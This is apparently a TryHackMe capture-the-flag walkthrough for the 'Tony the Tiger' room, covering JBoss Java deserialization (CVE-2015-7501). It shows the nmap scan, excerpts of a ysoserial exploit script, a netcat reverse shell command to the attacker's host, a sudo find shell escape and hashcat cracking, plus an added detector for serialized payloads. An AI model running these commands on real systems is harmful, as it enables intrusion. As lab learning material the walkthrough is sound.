Tony the Tiger
In this post, we will look into the room “Tony the Tiger” from TryHackMe, which can be found on https://tryhackme.com
The room exploits a Java deserialization vulnerability, CVE-2015-7501, which allows code execution when the server deserializes an attacker-supplied message.
So what we’ll do is execute a netcat reverse shell on the host to gain access and then root it.
Task 1 Deploy
Deploy the machine
Task 2 Intro
All answers are in the introduction paragraph so kindly written by the author of the room; figure them out!
Task 3 Recon
We can run Nmap against the host to check for open ports:
nmap -sC -sV -oN nmap {IP}
Notice that the question explicitly asks about port 8080, and in my case it took a little longer to initialize than the other open ports. Keep in mind that if it returns closed, you might want to rerun the command.
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:97:8c:b9:74:d0:f3:9e:fe:f3:a5:ea:f8:a9:b5:7a (DSA)
|   2048 33:a4:7b:91:38:58:50:30:89:2d:e4:57:bb:07:bb:2f (RSA)
|   256 21:01:8b:37:f5:1e:2b:c5:57:f1:b0:42:b7:32:ab:ea (ECDSA)
|_  256 f6:36:07:3c:3b:3d:71:30:c4:cd:2a:13:00:b5:25:ae (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Hugo 0.66.0
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Tony's Blog
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss AS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There we have it: SSH is open and there are two HTTP servers running.
To answer the questions, we have:
- Service on 8080: Apache Tomcat/Coyote JSP engine 1.1
- Name of front-end application on 8080: JBoss
Task 4 Tony’s Flag
It took me quite some time to figure out how to get this flag, since I’m quite new to cybersecurity and all, but here it is: we have to analyse the images.
See the Tony the Tiger image on a blue background? Download it.
The first thing you read about steganography is to run strings:
strings tony.jpg
There it is!!
Task 5 Exploit!
The room author kindly provides the Python script for exploiting the vulnerability; let’s take a look.
Basically, we send a POST request with a payload that exploits the Java deserialization vulnerability and executes our Linux command.
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections5', args.command])
This uses the ysoserial .jar file to build the serialized payload (a CommonsCollections5 gadget chain) that carries our command.
Then we send a POST request with the payload:
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
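From the defender's side, the request above has two recognizable traits: it targets the JBoss invoker servlet path and its body is a raw Java serialization stream, which always begins with the magic bytes AC ED 00 05. The following is an added example, not part of the room or the exploit script, that classifies HTTP requests on those two traits; the request records and the `HttpRequest` type are constructed for illustration.

```python
# Added example (not from the room or the original exploit script): flag HTTP
# requests that look like a CVE-2015-7501 attempt against the JBoss invoker
# servlet, i.e. a POST to the invoker path whose body starts with the Java
# ObjectOutputStream header. Sample requests below are constructed.
from dataclasses import dataclass

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC (0xACED) + STREAM_VERSION (5)
INVOKER_PATHS = ("/invoker/JMXInvokerServlet", "/invoker/EJBInvokerServlet")


@dataclass
class HttpRequest:  # minimal stand-in for a parsed request (constructed)
    method: str
    path: str
    body: bytes


def is_java_serialized(body: bytes) -> bool:
    """True if the body begins with a Java serialization stream header."""
    return body.startswith(JAVA_SERIAL_MAGIC)


def classify(req: HttpRequest) -> str:
    """Return a finding label for one request, or 'ok' if nothing stands out."""
    path = req.path.split("?", 1)[0]  # ignore any query string
    on_invoker = any(path.lower().startswith(p.lower()) for p in INVOKER_PATHS)
    serialized = is_java_serialized(req.body)
    if on_invoker and serialized and req.method.upper() == "POST":
        return "cve-2015-7501-like: serialized object posted to invoker servlet"
    if on_invoker:
        return "invoker servlet reached: path should be removed or access-controlled"
    if serialized:
        return "java serialized payload on non-invoker path"
    return "ok"


SAMPLE_REQUESTS = [  # constructed, not captured traffic
    HttpRequest("GET", "/index.html", b""),
    HttpRequest("POST", "/invoker/JMXInvokerServlet", JAVA_SERIAL_MAGIC + b"\x73\x72"),
    HttpRequest("GET", "/invoker/JMXInvokerServlet", b""),
    HttpRequest("POST", "/upload", JAVA_SERIAL_MAGIC + b"\x00"),
]


def scan(requests=SAMPLE_REQUESTS):
    """Classify every request; returns (method, path, label) tuples."""
    return [(r.method, r.path, classify(r)) for r in requests]


if __name__ == "__main__":
    for method, path, label in scan():
        print(f"{method} {path}: {label}")
```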
Reverse Shell
Now we can get a reverse shell on this machine to gain access:
In one terminal, run
nc -lvnp 8888
In another terminal, run
python exploit.py --ysoserial-path ysoserial.jar --proto http {IP}:8080 "nc {Self_IP} -e /bin/sh 8888"
Our first terminal now has a shell on the host. For stability, spawn a TTY by running:
python -c 'import pty; pty.spawn("/bin/bash")'
Task 6 Find User JBoss’ flag
Now that we have access, check which user we are by running whoami.
As you can see, we are not JBoss.
Navigate to /home/jboss and run ls -la to check for files.
cat note
Here we can chill and read the discussion between the two users, which includes a new password for the jboss user.
Log in over SSH as jboss with that password:
ssh jboss@{IP}
Navigate to /home/jboss and run ls -la again.
cat the .jboss file to read the flag.
Task 7 Escalation!
We can always enumerate with LinEnum or LinPEAS, but I always enjoy looking for SUID and sudo misconfigurations, so let’s run
sudo -l
As we can see, the jboss user is allowed to run /usr/bin/find as root; maybe we can find a way to escape to a shell from this command.
A first-page search on “linux escape to shell find” got me here.
Now we can escape to a shell using the find command:
sudo find /etc/passwd -exec /bin/sh \;
Let’s cat /root/root.txt
and we get a flag...
but it’s clearly not the answer expected on THM.
It’s also not a known hash (the hashid command does not identify it):
hashid {HASH}
Since I have a little experience with access tokens for system authentication, I noticed the “==” characters at the end of our flag and thought, well, maybe this is Base64 encoded.
So I went here, decoded it, and guess what: hashid now identifies it as a simple MD5.
We can easily crack it with rockyou.txt now:
hashcat -a 0 -m 0 {HASH} /usr/share/wordlists/rockyou.txt
and there we have it.